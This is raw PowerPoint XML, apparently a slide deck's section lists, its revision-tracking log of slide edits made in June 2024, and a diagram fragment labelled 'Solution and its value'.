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8" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId16"/>
  </p:notes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0D5A08-38FC-4BF0-976E-7955D49ED71D}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="259"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{9B03104C-3765-4B6F-AE66-86FEB12F7695}">
          <p14:sldIdLst>
            <p14:sldId id="260"/>
            <p14:sldId id="261"/>
            <p14:sldId id="262"/>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="263"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{8829FB4C-303B-4282-BB9E-17652C744D8C}">
          <p14:sldIdLst>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="269"/>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67FFC2-FF22-4416-8FDA-1ED967EC40A3}" v="12" dt="2024-06-12T09:31:20.3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KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd addSection modSection">
      <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:14:48.019" v="1499" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:27:37.243" v="57" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:27:37.243" v="57" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="2" creationId="{67D4CAE7-92FB-49A0-191E-7B71A5C2B67F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:27:09.594" v="50" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:25:57.743" v="0" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="22" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod ord modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T15:07:17.528" v="543"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:43:20.658" v="167" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:43:32.241" v="168" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="21" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:43:32.241" v="168" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="22" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:45:27.160" v="185" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="23" creationId="{28E9A193-B518-D959-B701-5A73BB4CB011}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:56:51.975" v="539" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:48:51.329" v="217" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:48:26.160" v="211" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:48:26.160" v="211" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:56:14.412" v="535" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="11" creationId="{2AC2E613-13CF-B390-7C8E-646CA04B0F84}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:48:26.160" v="211" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="12" creationId="{6BB30A13-3895-1CD1-6C71-AD31F5546D7C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:51:03.316" v="370"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:spMk id="13" creationId="{A2B48457-B727-F610-E390-6F2B9AD88130}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T14:56:51.975" v="539" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="259"/>
            <ac:picMk id="15" creationId="{F8B9517B-408D-5892-CAB8-F6453839090E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:31:46.569" v="989" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:19:17.359" v="549" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:19:03.389" v="547" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:19:03.389" v="547" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:31:46.569" v="989" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:spMk id="11" creationId="{4CB9494F-CB3D-99CF-97DE-18384C4FF339}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:26:04.103" v="903" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:picMk id="13" creationId="{96C9E29C-98C2-E3F8-6A4A-9585C8F419CF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:27:12.130" v="905" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:picMk id="15" creationId="{B1D2CF31-2675-5BCC-34D8-DA2BDC8D833D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:29:51.439" v="908" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="260"/>
            <ac:picMk id="17" creationId="{2520CC89-2BCC-CDBE-D513-8EDC5D7FB8D3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:35:55.998" v="1005" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:34:56.176" v="995" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="261"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:35:12.319" v="997" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="261"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:34:31.522" v="990" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="261"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:35:55.998" v="1005" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="261"/>
            <ac:spMk id="9" creationId="{04424235-4229-535E-03E7-C5138D572D07}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:43:04.904" v="1022" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:37:11.440" v="1012" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:36:54.658" v="1008" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:36:54.658" v="1008" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:43:04.904" v="1022" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:spMk id="10" creationId="{5670CA18-5EB9-40D3-8216-A7599386802B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:36:59.721" v="1009" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="262"/>
            <ac:picMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:57:10.850" v="1239" actId="123"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:53:39.926" v="1063" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="263"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:53:49.072" v="1064" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="263"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:57:10.850" v="1239" actId="123"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="263"/>
            <ac:spMk id="9" creationId="{1EE112B5-808D-8A68-D162-6AD0F842AAC0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:14:48.019" v="1499" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:10:05.888" v="1261" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:10:07.384" v="1263" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="10" creationId="{AFAD75C8-7C60-C06B-BBEE-4049904A5B23}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:10:07.384" v="1263" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="11" creationId="{3189E137-A043-9A33-EF10-DA602EDB8147}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:11:54.455" v="1267" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="13" creationId="{A273F647-FEE6-D080-3578-F5ACA87FCD22}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:12:04.234" v="1269" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="15" creationId="{CC81AA79-B151-BC2C-4BC7-A5EE5993DEED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:14:48.019" v="1499" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="264"/>
            <ac:spMk id="17" creationId="{11FC879F-54C5-DF41-9278-7F4E757B4D14}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:06:52.735" v="1255" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T10:06:52.735" v="1255" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="265"/>
            <ac:spMk id="12" creationId="{78E4CC72-D216-4C0D-A3B1-B04338A93FE6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:57:25.014" v="1240" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="265"/>
            <ac:picMk id="10" creationId="{C5AD288D-D022-38C5-B51F-3B1ED8599364}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:44:02.945" v="1025"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="127950332" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:44:02.945" v="1025"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127950332" sldId="266"/>
            <ac:spMk id="2" creationId="{5B7CF68C-8AB2-5381-F366-AF79105535D0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-11T00:26:56.061" v="545" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2329732180" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-10T15:05:34.139" v="541" actId="680"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3931855116" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:47:23.432" v="1044"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2625086820" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:47:23.432" v="1044"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2625086820" sldId="267"/>
            <ac:spMk id="2" creationId="{C4B1E2A3-77C7-CCFC-CAB4-6DAF56BBF1D5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:49:27.077" v="1056" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2722415194" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:49:12.030" v="1052" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2722415194" sldId="268"/>
            <ac:spMk id="2" creationId="{DBD4D83A-16FC-0DC4-8AE2-AB8B86C0FD4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="GANESH KUMAR KORNU" userId="c56bdff485573c1a" providerId="LiveId" clId="{3F67FFC2-FF22-4416-8FDA-1ED967EC40A3}" dt="2024-06-12T09:49:27.077" v="1056" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2722415194" sldId="268"/>
            <ac:picMk id="4" creationId="{E55F5ED2-416E-6A73-374B-95553742245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1E566B75-AAA8-4350-82D7-C81D8420F378}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" dirty="0"/>
            <a:t>Solution and its value</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7650997E-E1A4-41FF-8F3F-904DB9FBB42B}" type="parTrans" cxnId="{87D4AA3A-DFE4-433D-9D02-C67D5246489D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
